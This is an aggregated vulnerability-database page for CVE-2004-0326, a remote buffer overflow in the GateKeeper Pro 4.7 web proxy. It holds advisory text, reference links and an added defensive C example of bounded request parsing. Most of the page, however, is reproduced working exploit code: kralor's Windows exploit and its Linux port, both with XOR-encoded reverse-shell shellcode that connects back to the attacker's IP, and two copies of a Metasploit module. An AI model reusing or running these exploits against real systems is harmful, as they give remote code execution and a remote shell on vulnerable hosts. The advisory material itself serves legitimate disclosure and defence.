CVE-2004-0326
CVSS 10.0
Published: 2004-11-23 00:00:00
Revised: 2016-10-17 22:43:54

[Original] Buffer overflow in the web proxy for GateKeeper Pro 4.7 allows remote attackers to execute arbitrary code via a long GET request.


[CNNVD] Proxy-Pro Professional GateKeeper Web Proxy Buffer Overflow Vulnerability (CNNVD-200411-100)

        
        Proxy-Pro Professional GateKeeper is a proxy server program that handles multiple protocols.
        The web proxy included in Proxy-Pro Professional GateKeeper contains a buffer overflow; a remote attacker can exploit it to execute arbitrary instructions on the system with the privileges of the GateKeeper process.
        Submitting an HTTP GET request containing overly long data through GateKeeper's web proxy component triggers the buffer overflow; carefully crafted data may execute arbitrary instructions on the system with the privileges of the GateKeeper process.
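The trigger in the description above (and in the OSVDB record further down, which says the product "fails to validate HTTP requests") is a request line far longer than the fixed-size stack buffer the proxy copies it into. As an added illustration, not GateKeeper's code (its source is not public) and not from this page's authors, the following C parser shows the bounded-parsing discipline that prevents this bug class: every field has a fixed slot, every length is checked before the copy, and a request line the size of the advisory's roughly 4100-byte GET is refused with a status code before a single byte of the URL is copied. The limits MAX_METHOD, MAX_URL and MAX_LINE, the function names and the sample requests are all assumptions constructed for this example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed limits for an illustrative hardened proxy request-line parser.
 * These are not GateKeeper's values: the advisory reports a crash at roughly
 * 4100 bytes, so a hard cap well below that, enforced before any copy, turns
 * the overlong GET into a clean rejection instead of a stack overwrite. */
#define MAX_METHOD 8
#define MAX_URL    2048
#define MAX_LINE   (MAX_METHOD + 1 + MAX_URL + 1 + 15) /* "METHOD SP URL SP VERSION" */

struct request_line {
    char method[MAX_METHOD + 1];
    char url[MAX_URL + 1];
    char version[16];
};

enum parse_status {
    PARSE_OK = 0,
    PARSE_NO_CRLF,        /* line not yet terminated inside the permitted window */
    PARSE_LINE_TOO_LONG,  /* request line exceeds MAX_LINE: the shape of the CVE-2004-0326 trigger */
    PARSE_BAD_SHAPE,      /* not "METHOD SP URL SP VERSION" */
    PARSE_FIELD_TOO_LONG  /* one field does not fit its fixed-size slot */
};

/* Copy n bytes of src into dst only if they fit in cap bytes plus the NUL;
 * refuse rather than truncate, so no caller ever sees a silently clipped URL. */
static int copy_field(char *dst, size_t cap, const char *src, size_t n)
{
    if (n > cap)
        return -1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return 0;
}

/* Parse the first line of buf (len bytes, not necessarily NUL-terminated).
 * Every bound is checked before the corresponding memcpy, and the search for
 * CRLF itself stops at MAX_LINE + 2 so an overlong line is never scanned. */
enum parse_status parse_request_line(const char *buf, size_t len, struct request_line *out)
{
    size_t window = len < MAX_LINE + 2 ? len : MAX_LINE + 2;
    const char *eol = NULL;
    size_t i;

    for (i = 0; i + 1 < window; i++) {
        if (buf[i] == '\r' && buf[i + 1] == '\n') {
            eol = buf + i;
            break;
        }
    }
    if (eol == NULL)
        return len > MAX_LINE ? PARSE_LINE_TOO_LONG : PARSE_NO_CRLF;

    size_t line_len = (size_t)(eol - buf);
    const char *sp1 = memchr(buf, ' ', line_len);
    if (sp1 == NULL)
        return PARSE_BAD_SHAPE;
    const char *sp2 = memchr(sp1 + 1, ' ', (size_t)(eol - (sp1 + 1)));
    if (sp2 == NULL)
        return PARSE_BAD_SHAPE;

    if (copy_field(out->method, MAX_METHOD, buf, (size_t)(sp1 - buf)) < 0)
        return PARSE_FIELD_TOO_LONG;
    if (copy_field(out->url, MAX_URL, sp1 + 1, (size_t)(sp2 - (sp1 + 1))) < 0)
        return PARSE_FIELD_TOO_LONG;
    if (copy_field(out->version, sizeof(out->version) - 1, sp2 + 1, (size_t)(eol - (sp2 + 1))) < 0)
        return PARSE_FIELD_TOO_LONG;
    return PARSE_OK;
}

/* Parse a NUL-terminated request and return only its status (used by the checks below). */
enum parse_status parse_status_of(const char *req)
{
    struct request_line r;
    return parse_request_line(req, strlen(req), &r);
}

/* Constructed request in the shape the advisory describes: a GET whose URL is
 * followed by 'padding' filler bytes ('A' here), then the rest of the request. */
size_t build_long_get(char *dst, size_t cap, size_t padding)
{
    const char *prefix = "GET http://www.example.com/";
    const char *suffix = " HTTP/1.0\r\nHost: www.example.com\r\n\r\n";
    size_t need = strlen(prefix) + padding + strlen(suffix);
    if (need >= cap)
        return 0;
    memcpy(dst, prefix, strlen(prefix));
    memset(dst + strlen(prefix), 'A', padding);
    memcpy(dst + strlen(prefix) + padding, suffix, strlen(suffix) + 1);
    return need;
}

/* Status the parser returns for a constructed GET with the given amount of filler. */
enum parse_status check_constructed_long_get(size_t padding)
{
    static char req[8192];
    struct request_line r;
    size_t n = build_long_get(req, sizeof req, padding);
    if (n == 0)
        return PARSE_LINE_TOO_LONG; /* would not even fit the scratch buffer */
    return parse_request_line(req, n, &r);
}

/* A well-formed request of ordinary size parses into its three fields. */
int parse_normal_example(void)
{
    struct request_line r;
    const char *req = "GET http://www.example.com/index.html HTTP/1.0\r\nHost: www.example.com\r\n\r\n";
    if (parse_request_line(req, strlen(req), &r) != PARSE_OK)
        return 0;
    return strcmp(r.method, "GET") == 0
        && strcmp(r.url, "http://www.example.com/index.html") == 0
        && strcmp(r.version, "HTTP/1.0") == 0;
}

int main(void)
{
    printf("normal request parses: %s\n", parse_normal_example() ? "yes" : "no");
    printf("advisory-shaped GET (4105 filler bytes): status %d (%d = line too long)\n",
           (int)check_constructed_long_get(4105), (int)PARSE_LINE_TOO_LONG);
    return 0;
}
```

A request built in the advisory's shape, a GET followed by some 4100 filler bytes, comes back as PARSE_LINE_TOO_LONG without any copy having taken place; a proxy written this way would have answered with an error rather than crashed. Since no vendor fix is recorded on this page and the only workaround given is blocking access to port 3128, the equivalent network-side control is a length limit on request lines reaching that port.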
        

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0326
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0326
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-100
(Official data source) CNNVD

- Other links and resources

http://lists.grok.org.uk/pipermail/full-disclosure/2004-February/017703.html
(UNKNOWN)  FULLDISC  20040222 GateKeeper Pro 4.7 buffer overflow
http://marc.info/?l=bugtraq&m=107755692400728&w=2
(UNKNOWN)  BUGTRAQ  20040222 GateKeeper Pro 4.7 buffer overflow
http://www.securityfocus.com/bid/9716
(VENDOR_ADVISORY)  BID  9716
http://xforce.iss.net/xforce/xfdb/15277
(VENDOR_ADVISORY)  XF  gatekeeper-long-get-bo(15277)

- Vulnerability information

Proxy-Pro Professional GateKeeper Web Proxy Buffer Overflow Vulnerability
Critical  Boundary condition error
2004-11-23 00:00:00 2005-10-20 00:00:00
Remote
        
        

- Advisories and patches

        Vendor patches:
        Proxy-Pro
        ---------
        The vendor has not yet provided a patch or upgrade. Users of this software are advised to monitor the vendor's homepage for the latest version:

        http://www.proxy-pro.com/professional/index.html

- Vulnerability information (155)

GateKeeper Pro 4.7 web proxy Remote Buffer Overflow Exploit (EDBID:155)
windows remote
2004-02-26 Verified
3128 kralor
N/A [Download]
/*================[CRPT - FrenchTeam] =================*
  [Coromputer Security Advisory] - [CRPTSA-01]
 *=================== [Summary] =====================*
  Software : GateKeeper Pro 4.7
  Platforms : win32
  Risk : High
  Impact : Buffer overflow
  Release Date : 2004-02-23

 *=================== [Description] ====================*
  there is a trivial buffer overflow in the web proxy (default port 3128).

 *==================== [Details] ======================*
  Sending GET http://host.com/AAAAAAAAAA...(~4100bytes) will cause an access
  violation. Other services not tested, but they can be vulnerable too. Exact
  version can be checked from the administration service (default port 2000).

 *==================== [Exploits] ======================*
 /****************************************************/
 /* [Crpt]    GateKeeper Pro 4.7 remote sploit by kralor    [Crpt]  */
 /****************************************************/
 /* bug discovered & coded by: kralor [from coromputer]            */
 /* tested on: win2k pro and winXP                                          */
 /* it uses a static offset to hijack execution to the shellcode..    */
 /* so it is 100% universal. Nothing more to say..                      */
 /****************************************************/
 /*informations: www coromputer net irc undernet #coromputer    */
 /****************************************************/

 #include <stdio.h>
 #include <stdlib.h>
 #include <windows.h>
 #include <winsock.h>

 #pragma comment (lib,"ws2_32")

 #define PORT 3128
 #define ADMIN_PORT 2000
 #define VERSION "4.7.0"
 #define RET_POS 4079
 #define SIZE 4105
 #define RET_ADDR 0x03b1e121
 #define REQ  "GET http://www.microsoft.com/"
 #define REQ2 "\r\nHost: www.microsoft.com\r\n\r\n"
 // sequence of 4 opcodes
 #define HOP 0xd4 // host opcode
 #define POP 0xd7 // port opcode

 int cnx(char *host, int port)
 {
        int sock;
        struct sockaddr_in yeah;
        struct hostent *she;

        sock=socket(AF_INET,SOCK_STREAM,0);
        if(!sock) {
                printf("error: unable to create socket\r\n");
                return 0;
                }
        yeah.sin_family=AF_INET;
        yeah.sin_addr.s_addr=inet_addr(host);
        yeah.sin_port=htons((u_short)port);

 if((she=gethostbyname(host))!=NULL) {
        memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length);
        } else {
        if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) {
                printf("error: cannot resolve host\r\n");
                return 0;
                }
        }
        printf("[+] Connecting to %-30s ...",host);
        if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) {
                printf("error: connection refused\r\n");
                return 0;
                }
        printf("Done\r\n");
        return sock;
 }


 void banner(void)
 {
        printf("\r\n\t  [Crpt] GateKeeper Pro 4.7 remote sploit by kralor [Crpt]\r\n");
        printf("\t\t www.coromputer.net && undernet #coromputer\r\n\r\n");
        return;
 }


 void syntax(char *prog)
 {
        printf("syntax: %s <host> <your_ip> <your_port>\r\n",prog);
        exit(0);
 }

 int main(int argc, char *argv[])
 {
        WSADATA wsaData;
        int sock;
        char buffer[1024],useme[SIZE],*ptr;
        unsigned long host,port;
        unsigned int i;
        char shellc0de[] =   /* sizeof(shellc0de+xorer) == 332 bytes */
        /* classic xorer */
        "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66"
        "\xb9\x33\x01\x80\x33\x95\x43\xe2\xfa"
        /* shellc0de */
        "\x1e\x61\xc0\xc3\xf1\x34\xa5"
        "\x95\x95\x95\x1e\xd5\x99\x1e\xe5\x89\x38\x1e\xfd\x9d\x7e\x95\x1e"
        "\x50\xcb\xc8\x1c\x93\x6a\xa3\xfd\x1b\xdb\x9b\x79\x7d\x38\x95\x95"
        "\x95\xfd\xa6\xa7\x95\x95\xfd\xe2\xe6\xa7\xca\xc1\x6a\x45\x1e\x6d"
        "\xc2\xfd\x4c\x9c\x60\x38\x7d\x06\x95\x95\x95\xa6\x5c\xc4\xc4\xc4"
        "\xc4\xd4\xc4\xd4\xc4\x6a\x45\x1c\xd3\xb1\xc2\xfd\x79\x6c\x3f\xf5"
        "\x7d\xec\x95\x95\x95\xfd\xd4\xd4\xd4\xd4\xfd\xd7\xd7\xd7\xd7\x1e"
        "\x59\xff\x85\xc4\x6a\xe3\xb1\x6a\x45\xfd\xf6\xf8\xf1\x95\x1c\xf3"
        "\xa5\x6a\xa3\xfd\xe7\x6b\x26\x83\x7d\xc4\x95\x95\x95\x1c\xd3\x8b"
        "\x16\x79\xc1\x18\xa9\xb1\xa6\x55\xa6\x5c\x16\x54\x80\x3e\x77\x68"
        "\x53\xd1\xb1\x85\xd1\x6b\xd1\xb1\xa8\x6b\xd1\xb1\xa9\x1e\xd3\xb1"
        "\x1c\xd1\xb1\xdd\x1c\xd1\xb1\xd9\x1c\xd1\xb1\xc5\x18\xd1\xb1\x85"
        "\xc1\xc5\xc4\xc4\xc4\xff\x94\xc4\xc4\x6a\xe3\xa5\xc4\x6a\xc3\x8b"
        "\x6a\xa3\xfd\x7a\x5b\x75\xf5\x7d\x97\x95\x95\x95\x6a\x45\xc6\xc0"
        "\xc3\xc2\x1e\xf9\xb1\x8d\x1e\xd0\xa9\x1e\xc1\x90\xed\x96\x40\x1e"
        "\xdf\x8d\x1e\xcf\xb5\x96\x48\x76\xa7\xdc\x1e\xa1\x1e\x96\x60\xa6"
        "\x6a\x69\xa6\x55\x39\xaf\x51\xe1\x92\x54\x5a\x98\x96\x6d\x7e\x67"
        "\xae\xe9\xb1\x81\xe0\x74\x1e\xcf\xb1\x96\x48\xf3\x1e\x99\xde\x1e"
        "\xcf\x89\x96\x48\x1e\x91\x1e\x96\x50\x7e\x97\xa6\x55\x1e\x40\xca"
        "\xcb\xc8\xce\x57\x91\x95";

        banner();

 if(argc!=4)
        syntax(argv[0]);
        host=inet_addr(argv[2])^0x95959595;
        port=atoi(argv[3]);
        if(port<=0||port>65535) {
                printf("error: <port> must be between 1 and 65535\r\n");
                return -1;
        }
        port=htons((unsigned short)port);
        port=port<<16;
        port+=0x0002;
        port=port^0x95959595;

 for(i=0;i<sizeof(shellc0de);i++) {
        if((unsigned char)shellc0de[i]==HOP&&(unsigned char)shellc0de[i+1]==HOP)
                if((unsigned char)shellc0de[i+2]==HOP&&(unsigned char)shellc0de[i+3]==HOP) {
                        memcpy(&shellc0de[i],&host,4);
                        host=0;
                        }
        if((unsigned char)shellc0de[i]==POP&&(unsigned char)shellc0de[i+1]==POP)
                if((unsigned char)shellc0de[i+2]==POP&&(unsigned char)shellc0de[i+3]==POP) {
                        memcpy(&shellc0de[i],&port,4);
                        port=0;
                        }
 }
 if(host||port) {
        printf("[i] error: unabled to find ip/port sequence in shellc0de\r\n");
        return -1;
        }

 if(WSAStartup(0x0101,&wsaData)!=0) {
        printf("[i] error: unable to load winsock\r\n");
        return -1;
        }
        printf("[-] Getting version through administration interface\r\n");
        sock=cnx(argv[1],ADMIN_PORT);
 if(!sock)
        printf("[i] warning: couldn't connect to admin int to get version, trying anyway\r\n");
 else {
        send(sock,"I'm a script kiddie\r\n",21,0);
        memset(buffer,0,sizeof(buffer));
        recv(sock,buffer,sizeof(buffer),0);
        memset(buffer,0,sizeof(buffer));
        recv(sock,buffer,sizeof(buffer),0);
        ptr=strstr(buffer,"GateKeeper@");
 if(!ptr)
        printf("[i] waring: version not found, trying anyway\r\n");
 else {
        ptr+=11;
        if(strncmp(ptr,VERSION,strlen(VERSION))) {
                printf("[i] error: wrong version\r\n");
                return -1;
        }
        printf("[i] %-44s ...OK\r\n","version");
        }
 }
        printf("[i] Starting to exploit\r\n");
        sock=cnx(argv[1],PORT);
 if(!sock)
        return -1;
        printf("[i] Preparing magic %-28s ...","packet");
        memset(useme,0x90,SIZE);
        memcpy(&useme[RET_POS-0x8ac],shellc0de,sizeof(shellc0de));
        *(unsigned long*)&useme[RET_POS] = RET_ADDR; // eip pointing to jmp ebx in exe memory
        memcpy(&useme[RET_POS+12],"\xe9\xed\xf6\xff\xff",5); // jmp $ - 0x92c
        printf("Done\r\n");
        printf("[i] Sending magic packet                         ...");
        send(sock,REQ,strlen(REQ),0);
        send(sock,useme,sizeof(useme),0);
        send(sock,REQ2,strlen(REQ2),0);
        printf("Done\r\n");
        closesocket(sock);
        return 0;
 }

 *================================= [Solutions] =================================*
  No solution, wait for Infopulse to read this advisory and release a patch.

 *================================= [Workaround] ================================*
  block undesired access to port 3128 (or uninstall the software and use a real
  proxy coded by real coders).

 *================================== [Credits] ==================================*
  Discovered and coded by Ivan Rodriguez Almuina <kralor@coromputer.net>

 *================================= [Disclaimer] ================================*
  The information within this paper may change without notice.
  Use of this information constitutes acceptance for use in an AS IS condition.
  There are NO warranties with to this information.
  In no event shall the author be liable for any damages whatsoever arising out
  of or in connection with the use or spread of this information.
  Any use of this information is at the user's own risk.

 *================================== [Feedback] =================================*
  Please send suggestions, updates, and comments to :
  irc : #coromputer on undernet
  url : http://www.coromputer.net
  mail : kralor@coromputer.net

\*============================\* www.coromputer.net */===========================*/

// milw0rm.com [2004-02-26]
		

- Vulnerability information (16692)

Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow (EDBID:16692)
windows remote
2010-09-20 Verified
3128 metasploit
N/A [Download]
##
# $Id: proxypro_http_get.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Proxy-Pro Professional
				GateKeeper 4.7. By sending a long HTTP GET to the default port
				of 3128, a remote attacker could overflow a buffer and execute
				arbitrary code.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2004-0326'],
					['OSVDB', '4027'],
					['BID', '9716'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00+&=%\x0a\x0d\x20",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Proxy-Pro GateKeeper 4.7', { 'Ret' => 0x03b1e121 } ], # GKService.exe
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Feb 23 2004',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(3128)
			], self.class)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		sploit  = "GET /" + rand_text_english(3603, payload_badchars)
		sploit += payload.encoded + [target.ret].pack('V') + make_nops(10)
		sploit += "\xe9" + [-497].pack('V') +  " HTTP/1.0" + "\r\n\r\n"

		sock.put(sploit)
		sock.get_once(-1, 3)

		handler
		disconnect
	end

end
		

- Vulnerability information (23741)

Proxy-Pro Professional GateKeeper 4.7 Web Proxy Buffer Overrun Vulnerability (EDBID:23741)
windows remote
2004-02-23 Verified
0 kralor
N/A [Download]
source: http://www.securityfocus.com/bid/9716/info

Proxy-Pro Professional GateKeeper is prone to a remotely exploitable buffer overrun that may be triggered by passing HTTP GET requests of excessive length through the web proxy component. This could be exploited to execute arbitrary code in the context of the software.

/******************************************************************/
 /* [Crpt]    GateKeeper Pro 4.7 remote sploit by kralor    [Crpt] */
/******************************************************************/
 /* bug discovered & coded by: kralor [from coromputer]            */
 /* tested on: win2k pro and winXP                                 */
 /* it uses a static offset to hijack execution to the shellcode.. */
 /* so it is 100% universal. Nothing more to say..                 */
/******************************************************************/
 /*informations: www.coromputer.net,irc undernet #coromputer       *
  *                                                                *
  *       Ported to Linux by shaun2k2 - shaunige@yahoo.co.uk       *
  *                     www.nettwerked.co.uk                       */
/******************************************************************/


/* UNIX include files. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>

/* Our defines. */
#define PORT 3128
#define ADMIN_PORT 2000
#define VERSION "4.7.0"
#define RET_POS 4079
#define SIZE 4105
#define RET_ADDR 0x03b1e121
/* Changing this might be advisable :P */
#define REQ  "GET http://www.microsoft.com/"
#define REQ2 "\r\nHost: www.microsoft.com\r\n\r\n"
 // sequence of 4 opcodes
#define HOP 0xd4 // host opcode
#define POP 0xd7 // port opcode

 int cnx(char *host, int port)
 {
        int sock; /* our little socket. */
        struct sockaddr_in yeah;
        struct hostent *she;

        /* Create the socket. */
        sock=socket(AF_INET,SOCK_STREAM,0);
        if(!sock) {
                printf("error: unable to create socket\r\n");
                return 0;
        }

        /* Fill in the address info struct. */
        yeah.sin_family=AF_INET;
        yeah.sin_addr.s_addr=inet_addr(host);
        yeah.sin_port=htons((u_short)port);

        /* Does the host exist? */
 if((she=gethostbyname(host))!=NULL) {
        memcpy((char *)&yeah.sin_addr,she->h_addr,she->h_length);
        } else {
        if((yeah.sin_addr.s_addr=inet_addr(host))==INADDR_NONE) {
                printf("error: cannot resolve host\r\n");
                return 0;
                }
        }
        printf("[+] Connecting to %-30s ...",host);
        if(connect(sock,(struct sockaddr*)&yeah,sizeof(yeah))!=0) {
                printf("error: connection refused\r\n");
                return 0;
                }
        printf("Done\r\n");
        return sock;
 }


 void banner(void)
 {
        printf("\r\n\t  [Crpt] GateKeeper Pro 4.7 remote sploit by kralor [Crpt]\r\n");
        printf("\t\t www.coromputer.net && undernet #coromputer\r\n\r\n");
        printf("\n\t\t Ported to Linux by shaun2k2 - shaunige@yahoo.co.uk\n\n");
        return;
 }


 void syntax(char *prog)
 {
        printf("syntax: %s <host> <your_ip> <your_port>\r\n",prog);
        exit(0);
 }

 int main(int argc, char *argv[])
 {
        int sock;
        char buffer[1024],useme[SIZE],*ptr;
        unsigned long host,port;
        unsigned int i;
        char shellc0de[] =   /* sizeof(shellc0de+xorer) == 332 bytes */
        /* classic xorer */
        "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66"
        "\xb9\x33\x01\x80\x33\x95\x43\xe2\xfa"
        /* shellc0de */
        "\x1e\x61\xc0\xc3\xf1\x34\xa5"
        "\x95\x95\x95\x1e\xd5\x99\x1e\xe5\x89\x38\x1e\xfd\x9d\x7e\x95\x1e"
        "\x50\xcb\xc8\x1c\x93\x6a\xa3\xfd\x1b\xdb\x9b\x79\x7d\x38\x95\x95"
        "\x95\xfd\xa6\xa7\x95\x95\xfd\xe2\xe6\xa7\xca\xc1\x6a\x45\x1e\x6d"
        "\xc2\xfd\x4c\x9c\x60\x38\x7d\x06\x95\x95\x95\xa6\x5c\xc4\xc4\xc4"
        "\xc4\xd4\xc4\xd4\xc4\x6a\x45\x1c\xd3\xb1\xc2\xfd\x79\x6c\x3f\xf5"
        "\x7d\xec\x95\x95\x95\xfd\xd4\xd4\xd4\xd4\xfd\xd7\xd7\xd7\xd7\x1e"
        "\x59\xff\x85\xc4\x6a\xe3\xb1\x6a\x45\xfd\xf6\xf8\xf1\x95\x1c\xf3"
        "\xa5\x6a\xa3\xfd\xe7\x6b\x26\x83\x7d\xc4\x95\x95\x95\x1c\xd3\x8b"
        "\x16\x79\xc1\x18\xa9\xb1\xa6\x55\xa6\x5c\x16\x54\x80\x3e\x77\x68"
        "\x53\xd1\xb1\x85\xd1\x6b\xd1\xb1\xa8\x6b\xd1\xb1\xa9\x1e\xd3\xb1"
        "\x1c\xd1\xb1\xdd\x1c\xd1\xb1\xd9\x1c\xd1\xb1\xc5\x18\xd1\xb1\x85"
        "\xc1\xc5\xc4\xc4\xc4\xff\x94\xc4\xc4\x6a\xe3\xa5\xc4\x6a\xc3\x8b"
        "\x6a\xa3\xfd\x7a\x5b\x75\xf5\x7d\x97\x95\x95\x95\x6a\x45\xc6\xc0"
        "\xc3\xc2\x1e\xf9\xb1\x8d\x1e\xd0\xa9\x1e\xc1\x90\xed\x96\x40\x1e"
        "\xdf\x8d\x1e\xcf\xb5\x96\x48\x76\xa7\xdc\x1e\xa1\x1e\x96\x60\xa6"
        "\x6a\x69\xa6\x55\x39\xaf\x51\xe1\x92\x54\x5a\x98\x96\x6d\x7e\x67"
        "\xae\xe9\xb1\x81\xe0\x74\x1e\xcf\xb1\x96\x48\xf3\x1e\x99\xde\x1e"
        "\xcf\x89\x96\x48\x1e\x91\x1e\x96\x50\x7e\x97\xa6\x55\x1e\x40\xca"
        "\xcb\xc8\xce\x57\x91\x95";

        banner();

 if(argc!=4)
        syntax(argv[0]);
        host=inet_addr(argv[2])^0x95959595;
        port=atoi(argv[3]);
        if(port<=0||port>65535) {
                printf("error: <port> must be between 1 and 65535\r\n");
                return -1;
        }
        port=htons((unsigned short)port);
        port=port<<16;
        port+=0x0002;
        port=port^0x95959595;

 for(i=0;i<sizeof(shellc0de);i++) {
        if((unsigned char)shellc0de[i]==HOP&&(unsigned char)shellc0de[i+1]==HOP)
                if((unsigned char)shellc0de[i+2]==HOP&&(unsigned char)shellc0de[i+3]==HOP) {
                        memcpy(&shellc0de[i],&host,4);
                        host=0;
                        }
        if((unsigned char)shellc0de[i]==POP&&(unsigned char)shellc0de[i+1]==POP)
                if((unsigned char)shellc0de[i+2]==POP&&(unsigned char)shellc0de[i+3]==POP) {
                        memcpy(&shellc0de[i],&port,4);
                        port=0;
                        }
 }
 if(host||port) {
        printf("[i] error: unabled to find ip/port sequence in shellc0de\r\n");
        return -1;
        }

        printf("[-] Getting version through administration interface\r\n");
        sock=cnx(argv[1],ADMIN_PORT);
 if(!sock)
        printf("[i] warning: couldn't connect to admin int to get version, trying anyway\r\n");
 else {

        /* If you really aren't a script kiddie, you might wanna remove
         * these ;) */
        send(sock,"I'm a script kiddie\r\n",21,0);
        memset(buffer,0,sizeof(buffer));
        recv(sock,buffer,sizeof(buffer),0);
        memset(buffer,0,sizeof(buffer));

        /* recv the daemon version. */
        recv(sock,buffer,sizeof(buffer),0);

        /* Checking if the daemon is GateKeeper. */
        ptr=strstr(buffer,"GateKeeper@");

        if(!ptr)
        printf("[i] warning: version not found, trying anyway\r\n");
 else {
        ptr+=11;

        /* Check for the vulnerable version. */
        if(strncmp(ptr,VERSION,strlen(VERSION))) {
                printf("[i] error: wrong version\r\n");
                return -1;
        }
        printf("[i] %-44s ...OK\r\n","version");
        }
 }
        printf("[i] Starting to exploit\r\n");
        sock=cnx(argv[1],PORT);
 if(!sock)
        return -1;
        printf("[i] Preparing magic %-28s ...","packet");

        /* Fill the exploit buffer with NOPs (hex 0x90). */
        memset(useme,0x90,SIZE);

        /* Copy the shellcode into the exploit buffer. */
        memcpy(&useme[RET_POS-0x8ac],shellc0de,sizeof(shellc0de));

        /* Return address here.  The ret address is placed in a specific
         * place, as kralor seems to know exactly where it needs to be. */
        *(unsigned long*)&useme[RET_POS] = RET_ADDR;
        memcpy(&useme[RET_POS+12],"\xe9\xed\xf6\xff\xff",5); // jmp $ - 0x92c
        printf("Done\r\n");
        printf("[i] Sending magic packet                         ...");
        send(sock,REQ,strlen(REQ),0);

        /* Inject the exploit buffer! */
        send(sock,useme,sizeof(useme),0);
        send(sock,REQ2,strlen(REQ2),0);
        printf("Done\r\n");
        close(sock);

        /* return sucess. */
        return 0;
 }
		

- Vulnerability information (F82930)

Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow (PacketStormID:F82930)
2009-10-30 00:00:00
MC  metasploit.com
exploit,remote,web,overflow,arbitrary
CVE-2004-0326
[Download]

This Metasploit module exploits a stack overflow in Proxy-Pro Professional GateKeeper 4.7. By sending a long HTTP GET to the default port of 3128, a remote attacker could overflow a buffer and execute arbitrary code.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow',
			'Description'    => %q{
		        This module exploits a stack overflow in Proxy-Pro Professional
		        GateKeeper 4.7. By sending a long HTTP GET to the default port
				of 3128, a remote attacker could overflow a buffer and execute
				arbitrary code.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					['CVE', '2004-0326'], 
					['OSVDB', '4027'],
					['BID', '9716'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00+&=%\x0a\x0d\x20",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			
			'Targets'        =>
				[
					[ 'Proxy-Pro GateKeeper 4.7', { 'Ret' => 0x03b1e121 } ], # GKService.exe
				],

			'Privileged'     => true,

			'DisclosureDate' => 'Feb 23 2004',

			'DefaultTarget' => 0))

			register_options(
				[
					Opt::RPORT(3128)
				], self.class)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		sploit  = "GET /" + rand_text_english(3603, payload_badchars)  
		sploit += payload.encoded + [target.ret].pack('V') + make_nops(10) 
		sploit += "\xe9" + [-497].pack('V') +  " HTTP/1.0" + "\r\n\r\n" 

		sock.put(sploit)
		sock.get_once(-1, 3)
		
		handler
		disconnect
	end

end
    

- Vulnerability information

4027
Proxy-Pro Professional GateKeeper Overflow
Remote / Network Access Input Manipulation
Loss of Confidentiality, Loss of Integrity, Loss of Availability Solution Unknown
Exploit Public

- Vulnerability description

A remote overflow exists in Proxy-Pro Gatekeeper Professional. The product fails to validate HTTP requests resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of confidentiality, integrity, and/or availability.

- Timeline

2004-02-23 2004-02-23
Unknown Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Proxy-Pro Professional GateKeeper Web Proxy Buffer Overrun Vulnerability
Boundary Condition Error 9716
Yes No
2004-02-23 12:00:00 2009-07-12 03:06:00
Discovery is credited to Iván Rodriguez Almuiña.

- Affected program versions

Proxy-Pro Professional GateKeeper 4.7

- Vulnerability discussion

Proxy-Pro Professional GateKeeper is prone to a remotely exploitable buffer overrun that may be triggered by passing HTTP GET requests of excessive length through the web proxy component. This could be exploited to execute arbitrary code in the context of the software.

- Exploitation

The following exploits were made available:

- Solution

